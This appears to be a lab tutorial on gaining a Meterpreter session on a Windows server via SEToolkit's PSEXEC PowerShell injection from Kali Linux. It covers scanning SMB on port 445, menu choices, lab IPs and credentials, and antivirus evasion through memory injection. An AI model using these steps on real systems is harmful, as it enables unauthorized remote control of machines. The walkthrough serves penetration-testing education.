Target: Window Server
Attacker machine: Kali Linux
In this article I am going to make PowerShell injection attack though SEToolkit; for this attack, it is necessary that SMB service must be running and you should aware of username and password of your target pc to get the Meterpreter session.
Let’s Begin The Game!!!
Scan the victim IP from NMAP by typing following command on the terminal in Kali Linux
Under version scan, it shows port 445 is open and if you are not aware from port protocol services then let me tell you that port 445 is used for SMB protocol for making communication between two different operating systems like as we have Linux and windows.
Now Click Applications > Exploitation Tools > Social Engineering Toolkit > setoolkit.
A new terminal gets open for the setoolkit framework and now you have to follow these steps for making an attack on the target.
From the screenshot, you can perceive that it through a menu to select the following approach for the attack.
Choose penetration testing (fast-track) and type2 for this method.
Fast-Track is an automated penetration suite for penetration testers. So from the next screenshot again we have following option, choose PSEXEC Powershell Injection and type 6 for it.
PSEXEC Powershell Injection Attack: This attack will inject a meterpreter backdoor through PowerShell memory injection. This will avoid Anti-Virus since we will never touch disk or memory. Will require Powershell to be installed on the remote victim machine. You can use either straight passwords or hash values.
Now give the following information to execute an attack on victim pc.
Enter remote IP as rhost: 192.168.1.104
Enter username: administrator
Enter password: Ignite@1234
If you don’t know the domain name hit enter only for this and same for random select to a number of threads hit enter.
Enter listener IP as lhost: 192.168.1.3
Enter port number: 445
Now this will generate a payload for PowerShell injection and start loading Metasploit framework itself. From the below image, you will found that through alphabetic shellcode we have got meterpreter session1 open.
Now type sessions to view active session
Further Type sessions –I 1 to get inside meterpreter mode.
Meterpreter> sysinfo
{NOTE: This attack is depending upon the version of SMB PROTOCOL; if the version is updated of 2.1 then maybe this attack is not successful. Use aggressive scanning method for version detail.}
